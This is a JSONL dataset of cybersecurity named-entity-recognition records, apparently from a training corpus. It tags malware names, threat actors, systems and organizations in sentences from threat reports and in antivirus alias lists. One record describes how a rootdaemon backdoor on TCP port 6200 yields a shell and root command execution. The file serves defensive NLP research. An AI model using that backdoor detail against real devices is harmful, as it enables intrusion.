{"text": "A backdoor also known as: AdClicker-O.dr Trojan.Win32.Revop.nbqd W32/TrojanX.HJO Adware.Winpup TROJ_REVOP.A Trojan-Downloader.Win32.VB.ca Trojan.Win32.A.Revop.251830[h] TROJ_REVOP.A AdClicker-O.dr W32/Trojan.MQHB-1521 Win32/TrojanDownloader.VB.CA SPR/Commercials.1 Trojan/Win32.Revop Win32.Troj.Undef.kcloud TrojanDownloader:Win32/VB.CA TrojanDownloader.VB Trj/Multidropper.BJ Win32.Trojan.Revop.cxum Trojan-Downloader.Win32.VB.CA W32/REVOP.A!tr Downloader.VB.EC Trojan.Win32.VB.AhnP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004797", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BackDoor-EDY.b Trojan.ExeDot.Win32.325 Trojan/ExeDot.cra Win32.Trojan.WisdomEyes.16070401.9500.9965 TROJ_EXEDOT.SMA Win.Trojan.Exedot-43 Trojan.Win32.ExeDot.dsmyq TrojWare.Win32.ExeDot.L TROJ_EXEDOT.SMA BackDoor-EDY.b Trojan/ExeDot.bs Trojan:Win32/Evadiped.A Trojan/Win32.Unknown Win32.Troj.ExeDot.kcloud Trojan.Heur.E8C832 Trojan:Win32/Evadiped.A Trojan/Win32.ExeDot.R4137 Trojan.ExeDot Trojan.BHO!WIw+XSz27Q8 Trojan.Win32.ExeDot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004799", "source": "cyner2_train"}}
{"text": "The main goal of this malware is to steal banking credentials from the victim's device.", "spans": {"MALWARE: malware": [[22, 29]], "SYSTEM: the victim's device.": [[67, 87]]}, "info": {"id": "cyner2_train_004800", "source": "cyner2_train"}}
{"text": "Honkbox is an active threat with at least three variants and multiple components, some of which have not been previously documented.", "spans": {"MALWARE: Honkbox": [[0, 7]], "MALWARE: active threat": [[14, 27]], "MALWARE: variants": [[48, 56]]}, "info": {"id": "cyner2_train_004803", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9985 Infostealer.Limitail TSPY_INFILOG.SM TSPY_INFILOG.SM TrojanSpy:MSIL/Grieftylo.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004804", "source": "cyner2_train"}}
{"text": "The actor responsible for this campaign utilized legitimate digital certificates to sign their tools and employed innovative techniques to cloak their command and control traffic.", "spans": {"THREAT_ACTOR: actor": [[4, 9]], "THREAT_ACTOR: campaign": [[31, 39]]}, "info": {"id": "cyner2_train_004806", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.TonersyASC.Trojan Ransom/W32.Dcryptor.2415104 Ransom.Mambretor.A5 Trojan.Dcryptor.Win32.2 Troj.Ransom.W32.Dcryptor.toNk Trojan/Filecoder.DCryptor.b Win32.Trojan.WisdomEyes.16070401.9500.9975 W32/HDD_Cryptor.A!Eldorado Ransom.HDDCryptor Win.Ransomware.HDDCryptor-2 Win32.Trojan-Ransom.Mamba.A Trojan-Ransom.Win32.Dcryptor.b Trojan.Win32.Filecoder.elaurk Trojan.Win32.Z.Dcryptor.2415104 Tool.PassView.841 Ransom_HDDCRYPTOR.SM Trojan-Ransom.Mamba W32/HDD_Cryptor.A!Eldorado Trojan.Dcryptor.a TR/FileCoder.rrsau Trojan[Ransom]/Win32.Blocker Trojan.Ransom.HDDCrypt.1 Trojan-Ransom.Win32.Dcryptor.b Ransom:Win32/Mambretor.A Trojan/Win32.Dcryptor.C1564580 Hoax.Dcryptor Ransom.HDDCryptor Trj/CI.A Win32/Filecoder.DCryptor.B Win32/Trojan.f14", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004807", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.DL.Banload!wDurcHh4EfA Spyware.Keylogger TROJ_BANLOAD.AET Win32.TRCrypt.Fkm PUA.Packed.PECompact-1 Trojan-Downloader.Win32.Banload.blpr Trojan-Spy.Win32.Bancos!IK Trojan.DownLoader3.52680 TROJ_BANLOAD.AET TrojanDownloader.Banload.awii Downloader/Win32.Banload TrojanDownloader.Banload.blmr Spyware.Keylogger!rem Trojan-Spy.Win32.Bancos W32/Banload.BLPR!tr.dldr Downloader.Banload.BKYW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004811", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Pugeju Trojan.Win32.Crypt.raab TrojWare.Win32.Inject.~AT BehavesLike.Win32.PUPXAC.lm Trojan-GameThief.Win32.OnLineGames Trojan/Crypt.acz Trojan/Win32.Invader Trj/CI.A Win32/Obfuscated.NBX Win32/Trojan.be7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004812", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Beaugrit.S16628 Trojan/Spy.Shiz.ncd Win32.Trojan-Spy.Shiz.b Backdoor.Trojan HT_SIMDA_GA310E71.UVPM Trojan.Win32.Ibank.vuhyo TrojWare.Win32.Spy.Shiz.ZV Trojan.PWS.Ibank.373 Trojan.Shiz.Win32.571 HT_SIMDA_GA310E71.UVPM BehavesLike.Win32.Backdoor.fh TR/BAS.Dorkbot.20619344 Trojan.Zusy.Elzob.D21CE PWS:Win32/Simda.K Win32/Spy.Shiz.NCD TrojanSpy.Shiz!qC77/NFCWBg Backdoor.Win32.Simda W32/Shiz.NCD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004813", "source": "cyner2_train"}}
{"text": "The cause for this uptick appears due to widespread WordPress site compromises.", "spans": {}, "info": {"id": "cyner2_train_004814", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clodfd4.Trojan.50bd Spyware.PasswordStealer TROJ_FRS.0NA000J416 TROJ_FRS.0NA000J416 Trojan.Win32.Z.Securityxploded.418304[h] BehavesLike.Win32.PWSZbot.gh W32/Trojan.ZJJQ-6216 Unwanted/Win32.Passview.C1588969 Riskware.Win32.PassDumper Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004815", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Cloda21.Trojan.c461 DLoader.QYW Win32/SillyDl.ACS Trojan.Win32.A.Downloader.146388 Trojan.DownLoader.6702 BehavesLike.Win32.Downloader.cm TrojanDownloader:Win32/Pusrac.A Trojan.Win32.Downloader.AE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004817", "source": "cyner2_train"}}
{"text": "Late in the summer of 2016, CrowdStrike Intelligence analysts began investigating a curious Android Package APK named Попр-Д30.apk' which contained a number of Russian language artifacts that were military in nature.", "spans": {"ORGANIZATION: CrowdStrike Intelligence analysts": [[28, 61]], "SYSTEM: Android Package APK": [[92, 111]], "MALWARE: Попр-Д30.apk'": [[118, 131]]}, "info": {"id": "cyner2_train_004818", "source": "cyner2_train"}}
{"text": "This malware gives attackers an avenue into internal networks which compromised devices are connected to—a notable risk if the device is used to connect to company networks.", "spans": {"MALWARE: malware": [[5, 12]], "THREAT_ACTOR: attackers": [[19, 28]], "SYSTEM: internal networks": [[44, 61]], "SYSTEM: device": [[127, 133]], "SYSTEM: company networks.": [[156, 173]]}, "info": {"id": "cyner2_train_004819", "source": "cyner2_train"}}
{"text": "The Trojan may perform a man-in-the-middle MitM attack on the browser installed on the compromised computer.", "spans": {"MALWARE: Trojan": [[4, 10]], "SYSTEM: the browser": [[58, 69]], "SYSTEM: the compromised computer.": [[83, 108]]}, "info": {"id": "cyner2_train_004822", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9670 Backdoor.Felismus Trojan/Win32.Skeeyah.C1905486 Trj/GdSda.A Trojan.Win32.Tomyjery", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004823", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.VBKrypt.208896.AN Trojan.Win32.VBKrypt!O WORM_VOBFUS.SMIA Trojan.Packed.21297 WORM_VOBFUS.SMIA Trojan.Barys.266 Trojan/Win32.VBKrypt.R2844 Worm.Win32.Vobfus", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004824", "source": "cyner2_train"}}
{"text": "Beginning in July 2015 and possibly earlier, the attack continued into August and is currently ongoing.", "spans": {}, "info": {"id": "cyner2_train_004825", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Constructor.Macro.Ultras.A Constructor.Win32.Ultras.10!O WM/Uck.kit Constructor.W32.Ultras!c Trojan/Constructor.Ultras.10.a Trojan.Constructor.Macro.Ultras.A Ultras.Kit Win.Tool.Macro-8 Trojan.Constructor.Macro.Ultras.A Constructor.Win32.Ultras.10.a Trojan.Constructor.Macro.Ultras.A Riskware.Win32.Ultras-10.hpwc Trojan.Constructor.Macro.Ultras.A Constructor.Macro.Ultras.A Trojan.Constructor.Macro.Ultras.A VirusConstructor.Ultras.2 Tool.Ultras.Win32.1 WM/Uck.kit W32/Tool.QHJM-3031 Constructor.Macro.Ultras.10 TR/ConKit.UltrasUck Constructor.Win32.Ultras.10.a HackTool/Win32.Constructor.C218755 Trojan.Constructor.Macro.Ultras.A Constructor.Ultras Win32.Trojan.Ultras.Pegg Constructor.Win32.Ultras Win32/Trojan.5bd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004827", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.Stration.D Win32.Worm.Stration.D Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.Worm.Stration.D Email-Worm.Win32.Warezov.k Win32.Worm.Stration.D Win32.Worm.Stration.D Heur.Packed.Unknown Win32.Worm.Stration.D Win32.HLLM.Limar Backdoor.Win32.IRCBot Trojan:Win32/Stration.K Win32.Worm.Stration.D Email-Worm.Win32.Warezov.k", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004828", "source": "cyner2_train"}}
{"text": "Recently, we detected Carbanak campaigns attempting to:Target high level executives in financial companies or in financial/decision-making roles in the Middle East, U.S. and Europe ,Spear-phishing emails delivering URLs, macro documents, exploit documents,Use of Spy.Sekur Carbanak malware and commodity remote access Trojans RATs such as jRAT, Netwire, Cybergate and others used in support of operations.", "spans": {"THREAT_ACTOR: Carbanak campaigns": [[22, 40]], "ORGANIZATION: high level executives in financial companies": [[62, 106]], "ORGANIZATION: financial/decision-making roles": [[113, 144]], "MALWARE: Spy.Sekur Carbanak malware": [[263, 289]], "MALWARE: commodity remote access Trojans RATs": [[294, 330]], "MALWARE: jRAT, Netwire, Cybergate": [[339, 363]], "THREAT_ACTOR: support of operations.": [[383, 405]]}, "info": {"id": "cyner2_train_004829", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.QueryexXAAF.Worm Application.Hacktool.AW Worm.Win32.Zombaque!O Worm.Zombaque.A3 WORM_BIZOME.SMD W32.Spybot.Worm Win32/Zombaque.A WORM_BIZOME.SMD Win.Worm.Zombaque-12 Application.Hacktool.AW Worm.Win32.Zombaque.a Application.Hacktool.AW Trojan.Win32.Zombaque.bzuxu Worm.Win32.Zombaque.318464.A Application.Hacktool.AW Application.Hacktool.AW Win32.HLLW.RAhack Worm.Zombaque.Win32.2 BehavesLike.Win32.Sality.fc Worm.Win32.Zombaque Worm/Zombaque.l Worm/Win32.Zombaque Worm:Win32/Zombaque.A Application.Hacktool.AW Worm.Win32.Zombaque.a Worm/Win32.Zombaque.R3338 Worm.Zombaque Win32/Zombaque.A Worm.Win32.Zombaque.a Worm.Zombaque!23w9coTlBlo W32/Zombaque.A.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004830", "source": "cyner2_train"}}
{"text": "In a quick Google search you can find practically anything you need to know.", "spans": {}, "info": {"id": "cyner2_train_004833", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Wdfload.89 Trojan.Win64.Wdfload Trojan.Wdfload.cqq TR/Wdfload.slana Trojan/Win64.Wdfload Trojan/Win64.Wdfload.C2364123 Trj/CI.A W32/Wdfload.AA!tr Win32/Trojan.bfd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004834", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader Win32.Trojan.WisdomEyes.16070401.9500.9691 Trojan-Downloader.Win32.Injecter.vxy BehavesLike.Win32.PWSZbot.fc W32/Trojan.SBIX-6310 Trojan.Heur.TP.E5F612 Trojan-Downloader.Win32.Injecter.vxy Trj/CI.A Win32/Trojan.03f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004835", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Pandex Heur.Packed.Unknown Trojan.DownLoad.3750 Heuristic.LooksLike.Win32.Morphine.I VirTool:Win32/Obfuscator.EK Voronezh.1600.A Packed.Morphine.C Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004836", "source": "cyner2_train"}}
{"text": "The threat actor leveraged the CVE-2017-0199 Microsoft Word Office/WordPad Remote Code Execution Vulnerability with carefully crafted decoy content customized for each target recipient.", "spans": {"THREAT_ACTOR: The threat actor": [[0, 16]], "VULNERABILITY: Microsoft Word Office/WordPad Remote Code Execution Vulnerability": [[45, 110]]}, "info": {"id": "cyner2_train_004837", "source": "cyner2_train"}}
{"text": "The first stage would be a malicious link within the e-mail or attachment, containing malicious code, in this case Pony.", "spans": {"MALWARE: Pony.": [[115, 120]]}, "info": {"id": "cyner2_train_004838", "source": "cyner2_train"}}
{"text": "Mobile app creators are often looking for ways to monetize their software.", "spans": {"ORGANIZATION: Mobile app creators": [[0, 19]], "SYSTEM: software.": [[65, 74]]}, "info": {"id": "cyner2_train_004839", "source": "cyner2_train"}}
{"text": "The attackers deliver malware through topically titled spearphises, for example Energy_Data_Meeting_fall_2016.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "cyner2_train_004840", "source": "cyner2_train"}}
{"text": "The source code for Linux.Mirai bot was released a few weeks ago.", "spans": {"MALWARE: bot": [[32, 35]]}, "info": {"id": "cyner2_train_004841", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Graftor.D27EA8 Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Expiro.hc Trojan.Win32.Scar TrojanDropper:Win32/Binko.A W32/Cbot.NCN!tr.bdr Win32/Trojan.Dropper.007", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004842", "source": "cyner2_train"}}
{"text": "The PureCrypter campaign uses the domain of a compromised non-profit organization as a Command and Control C2 to deliver a secondary payload.", "spans": {"THREAT_ACTOR: The PureCrypter campaign": [[0, 24]], "ORGANIZATION: non-profit organization": [[58, 81]], "MALWARE: secondary payload.": [[123, 141]]}, "info": {"id": "cyner2_train_004843", "source": "cyner2_train"}}
{"text": "Despite recent progress, the country is subject to ongoing conflict with ethnic rebels and an ongoing civil war.", "spans": {}, "info": {"id": "cyner2_train_004844", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Bancodor.482816 Backdoor/Bancodor.b BKDR_BADCODOR.A W32/Bancodor.C@bd Backdoor.Badcodor Win32/PSWSpider.G BKDR_BADCODOR.A Win.Trojan.Bancodor-22 Backdoor.Win32.Bancodor.b Trojan.Win32.Bancodor.fzet Backdoor.Win32.A.Bancodor.455260 Backdoor.Win32.Bancodor.~B Trojan.Bancdo Backdoor.Bancodor.Win32.150 W32/Bancodor.NOXQ-3353 Backdoor/Bancodor.b BDS/Badcodor.B.6 Trojan[Backdoor]/Win32.Bancodor Win32.Hack.Bancodor.b.kcloud Backdoor:Win32/Badcodor.B Backdoor.W32.Bancodor.b!c Backdoor.Win32.Bancodor.b Backdoor/Win32.Bancodor.R145952 Backdoor.Bancodor Win32/Bancodor.B Backdoor.Badcodor.A Backdoor.Win32.Bancodor Bck/Bancodor.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004847", "source": "cyner2_train"}}
{"text": "The Trojan drops a PowerPoint presentation that contains details about the 2nd Myanmar Industrial Human Resource Development Symposium.", "spans": {"MALWARE: Trojan": [[4, 10]]}, "info": {"id": "cyner2_train_004848", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Rincux.AV Trojan.Rincux.AV Win32.Trojan.WisdomEyes.16070401.9500.9998 TROJ_DLOAD.KKK Trojan.Rincux.AV Trojan.Rincux.AV BackDoor.Attack.594 TROJ_DLOAD.KKK Backdoor/Ceckno.awl W32/Downloader.L Trojan.Rincux.AV Trojan.Rincux.AV Backdoor.Ceckno!6jtmdMg8Vqs Virus.Win32.Small", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004849", "source": "cyner2_train"}}
{"text": "Recently, TrendMicro uncovered a new cyber-espionage attack by a well-funded and organized group targeting companies close to governments and in key industries mostly in Asia.", "spans": {"ORGANIZATION: TrendMicro": [[10, 20]], "THREAT_ACTOR: group": [[91, 96]], "ORGANIZATION: companies": [[107, 116]], "ORGANIZATION: governments": [[126, 137]], "ORGANIZATION: industries": [[149, 159]]}, "info": {"id": "cyner2_train_004850", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/AutoRun.Delf.RF Trojan.Win32.Autoruner2.czfwpa Win32.HLLW.Autoruner2.13746 BehavesLike.Win32.Dropper.dc Trojan.Graftor.D22611 Worm:Win32/Kerm.A Worm/Win32.AutoRun.C332941 Win32.Worm.Autorun.Wted Worm.Win32.Kerm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004852", "source": "cyner2_train"}}
{"text": "The Trojans designed to steal money from bank accounts pose a serious threat to Android users.", "spans": {"MALWARE: Trojans": [[4, 11]], "ORGANIZATION: bank accounts": [[41, 54]], "SYSTEM: Android users.": [[80, 94]]}, "info": {"id": "cyner2_train_004853", "source": "cyner2_train"}}
{"text": "Sending the command sh to TCP port 6200 results in a full terminal being dropped : Sending the command cmd followed by a proper terminal command will execute it and print the output ( in the example we use id which displays the identity of the system user running the issued commands ) : Doing the same as above but with command sucmd will run the terminal command as root : Other commands supported by rootdaemon on TCP port 6200 are su ( which in our tests did n't properly work ) , loadsocketpolicy , loadfilepolicy , remount and removeroot .", "spans": {}, "info": {"id": "cyner2_train_004854", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.D10C13 Trojan-Downloader.Win32.Sysdrop.am Trojan.Win32.Z.Sysdrop.598528 Troj.Downloader.W32!c Trojan.DownLoader22.41648 Adware.BrowseFox.Win32.397064 W32/Trojan.VFXM-3248 TrojanDownloader.Sysdrop.h BDS/Ananlog.okrph Trojan[Downloader]/Win32.Sysdrop Backdoor:Win32/Ananlog.A Trojan-Downloader.Win32.Sysdrop.am Trj/GdSda.A Win32.Trojan-downloader.Sysdrop.Eok Trojan.DL.Sysdrop! Win32/Backdoor.773", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004856", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.LethicKAAB.Trojan Trojan.VB Win32.Trojan.VB.bj Trojan.KillFiles.29071 BehavesLike.Win32.VBObfus.cm Trojan.Win32.VB Trojan.Ursu.DFEE TScope.Trojan.VB Win32/VB.OCY Win32/Worm.VB.X", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004857", "source": "cyner2_train"}}
{"text": "This is done by redirecting victim traffic through a malicious proxy server.", "spans": {"SYSTEM: malicious proxy server.": [[53, 76]]}, "info": {"id": "cyner2_train_004859", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.2B84 Worm.Esjey Win32.Trojan.WisdomEyes.16070401.9500.9938 Trojan.Win32.CFI.dcbjxv Trojan.DownLoader12.30909 BehavesLike.Win32.BadFile.wh Worm:Win32/Esjey.A Trojan.Graftor.D299B4 HEUR/Fakon.mwf Virus.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004862", "source": "cyner2_train"}}
{"text": "PluginPhantom is a new class of Google Android Trojan: it is the first to use updating and to evade static detection.", "spans": {"MALWARE: PluginPhantom": [[0, 13]], "MALWARE: Google Android Trojan:": [[32, 54]]}, "info": {"id": "cyner2_train_004868", "source": "cyner2_train"}}
{"text": "This is a read only mode which can help end users remain protected from malicious document files.", "spans": {}, "info": {"id": "cyner2_train_004871", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Delf.rdv Trojan.Win32.Qhost.afmj Trojan.AVKill.28805 TR/Rogue.kdz.976325 Trojan/Win32.Qhost Trojan.Graftor.D1154C Trojan.Win32.Qhost.afmj TrojanDownloader:Win32/Qhost.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004877", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Turla.a BKDR64_TURLA.YKV Win32.Trojan.WisdomEyes.16070401.9500.9968 Backdoor.Trojan BKDR64_TURLA.YKV Win64.Rootkit.Uroburos.A Backdoor.Win64.Turla.e Trojan.Win64.Turla.dflvfq Backdoor.Win64.Turla!c Trojan:W64/Turla.B BackDoor.Turla.20 Trojan.Turla.Win64.3 BDS/Turla.OE Backdoor.Win64.Turla.e Backdoor.Turla Trj/CI.A Win64/Turla.A Win32.Trojan.Url.Xqlp Win32/Trojan.URL.5b6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004879", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.Trojan-Ransom.Cryptolocker.AB Trojan.DownLoader25.64138 W32/Trojan.QFWN-8242 TR/Injector.pegqr Trojan.Graftor.D472BE TrojanDownloader:Win32/Zdowbot.B Heur.Malware-Cryptor.Filecoder Trojan.Win32.Zlader W32/Injector.DASN!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004881", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit.BypassUAC Win.Tool.Win7Elevate-1 Exploit.Win32.BypassUAC.bfo ApplicUnsaf.Win64.Win7Elevate Exploit.BypassUAC.Win32.550 W64/Trojan.SZNL-6335 Exploit.BypassUAC.ny SPR/Welevate.A Trojan[Exploit]/Win32.BypassUAC HackTool:Win64/Welevate.A Exploit.Win32.BypassUAC.bfo HackTool/Win32.Win7Elevate.R27568 Trj/CI.A Win32.Exploit.Bypassuac.Dyqu Trojan.Win32.Webprefix", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004882", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Randex.B@mm Backdoor.IRCBot W32/Randex.worm.B Win32.Trojan.WisdomEyes.16070401.9500.9811 W32/Randex.B W32.Randex Win32/Lioten.F Win.Worm.Randex-2 Worm.Win32.Randex.b Win32.Randex.B@mm Trojan.Win32.Randex.glyj W32.W.Randex.b!c Win32.Worm.Randex.Ajbc Win32.Randex.B@mm Worm.Win32.Randex.B Win32.Randex.B@mm Win32.HLLW.Randex.45056 Worm.Randex.Win32.3 BehavesLike.Win32.PWSZbot.lc W32/Randex.B Worm/Randex.b Worm/Win32.Randex Win32.Randex.E2C45E Worm.Win32.Randex.18432 Worm.Win32.Randex.b Worm:Win32/Randex.FN Trojan/Win32.HDC.C82152 Win32.Randex.B@mm Backdoor.IRCBot Worm.Randex Win32/Randex.B Worm.Win32.Randex!jlps7ds/blM W32/Randex.B!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004883", "source": "cyner2_train"}}
{"text": "The combination of these capabilities makes JSocket a unique and serious threat to the electronic and physical security of victims.", "spans": {"MALWARE: JSocket": [[44, 51]], "MALWARE: threat": [[73, 79]], "ORGANIZATION: electronic": [[87, 97]], "ORGANIZATION: physical security of victims.": [[102, 131]]}, "info": {"id": "cyner2_train_004884", "source": "cyner2_train"}}
{"text": "The EternalBlue exploit MS017-010 was initially used by WannaCry ransomware and Adylkuzz cryptocurrency miner.", "spans": {"MALWARE: The EternalBlue exploit": [[0, 23]], "MALWARE: WannaCry ransomware": [[56, 75]], "MALWARE: Adylkuzz cryptocurrency miner.": [[80, 110]]}, "info": {"id": "cyner2_train_004885", "source": "cyner2_train"}}
{"text": "SELECTED SAMPLES Package Name SHA-256 Digest com.rabbit.artcamera 18c277c7953983f45f2fe6ab4c7d872b2794c256604e43500045cb2b2084103f org.horoscope.astrology.predict 6f1a1dbeb5b28c80ddc51b77a83c7a27b045309c4f1bff48aaff7d79dfd4eb26 com.theforest.rotatemarswallpaper 4e78a26832a0d471922eb61231bc498463337fed8874db5f70b17dd06dcb9f09 com.jspany.temp 0ce78efa764ce1e7fb92c4de351ec1113f3e2ca4b2932feef46d7d62d6ae87f5 com.hua.ru.quan 780936deb27be5dceea20a5489014236796a74cc967a12e36cb56d9b8df9bc86 com.rongnea.udonood 8b2271938c524dd1064e74717b82e48b778e49e26b5ac2dae8856555b5489131 com.mbv.a.wp 01611e16f573da2c9dbc7acdd445d84bae71fecf2927753e341d8a5652b89a68 com.pho.nec.sg b4822eeb71c83e4aab5ddfecfb58459e5c5e10d382a2364da1c42621f58e119b Exobot ( Marcher ) - Android banking Trojan on the rise February 2017 Introduction The past months many different banking Trojans for the Android platform have received media attention .", "spans": {"MALWARE: Exobot": [[732, 738]], "MALWARE: Marcher": [[741, 748]], "SYSTEM: Android": [[753, 760], [870, 877]]}, "info": {"id": "cyner2_train_004886", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FilodasD.Trojan Backdoor/W32.Small.19968.AH Backdoor.Win32.Small!O Trojan.Downloader.slowblog Backdoor/Small.klk Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Small-13891 Backdoor.Win32.Small.klk Trojan.Win32.Small.reykq Backdoor.Win32.A.Small.19968 Backdoor.W32.Small.klk!c Trojan.DownLoad2.37573 Backdoor.Small.Win32.7582 BehavesLike.Win32.Downloader.lm Backdoor/Small.hcp W32/Cowsid.A!tr Trojan[Backdoor]/Win32.Small Win32.Hack.Small.kcloud Trojan.Heur.RP.E95DD0 Backdoor.Win32.Small.klk TrojanDownloader:Win32/Coswid.A Downloader/Win32.Small.C65823 Backdoor.Small Win32/TrojanDownloader.Coswid.A Backdoor.Small!nWa7meIxFMI Trojan-Downloader.Win32.Small", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004887", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Udsdangerousobject.Multi Win32.Trojan.WisdomEyes.16070401.9500.9998 BackDoor.Bulknet.780 W32/Trojan.JPON-8649 TrojanDropper:Win32/Insup.A Win32.Trojan.Spnr.Afhv Win32/Trojan.9d8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004888", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.DownLoader25.45618 Trojan:Win32/Relnicar.A!dha Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004892", "source": "cyner2_train"}}
{"text": "Ahnlab is a popular antivirus software in South Korea.", "spans": {"ORGANIZATION: Ahnlab": [[0, 6]], "SYSTEM: popular antivirus software": [[12, 38]]}, "info": {"id": "cyner2_train_004893", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ransom.Cerber.1 Trojan.Ransom.Cerber.1 Trojan.Dropper Trojan.Ransom.Cerber.1 Ransom_HPCERBER.SMALY5A Win32.Trojan.Kryptik.anp Ransom_HPCERBER.SMALY5A Trojan.Ransom.Cerber.1 Trojan.Ransom.Cerber.1 Trojan.Ransom.Cerber.1 Trojan.Ransom.Cerber.1 Trojan.Ssebot.2 BehavesLike.Win32.Dropper.vc Spammer:Win32/Rowdab.A Trj/GdSda.A W32/Kryptik.EXLK!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004894", "source": "cyner2_train"}}
{"text": "The themes of the messages used in the attacks are related to IT Infrastructure such as a log of Server Status Report or a list of Cisco Iron Port Appliance details.", "spans": {"SYSTEM: IT Infrastructure": [[62, 79]]}, "info": {"id": "cyner2_train_004897", "source": "cyner2_train"}}
{"text": "Last week on October 7, Raytheon | Websense® Security Labs™ noticed an interesting email campaign distributing what at first appeared to be Dridex botnet 220.", "spans": {"ORGANIZATION: Raytheon": [[24, 32]], "THREAT_ACTOR: email campaign": [[83, 97]], "MALWARE: at": [[116, 118]], "MALWARE: Dridex botnet 220.": [[140, 158]]}, "info": {"id": "cyner2_train_004898", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Adware.Toolbar.Win32.2435 Trojan.Win32.Spraxeth.elldrz RemoteAdmin.Dexn.v Worm:Win32/Spraxeth.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004902", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HT_PATCHER_FC170076.UVPA Win32.Trojan.WisdomEyes.16070401.9500.9787 Backdoor.Graybird HT_PATCHER_FC170076.UVPA Tool.Patcher.140 BehavesLike.Win32.Dropper.pm not-a-virus:RiskTool.Win32.Patcher HackTool:Win32/Patcher.D HackTool/Win32.Patcher.C862855 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004905", "source": "cyner2_train"}}
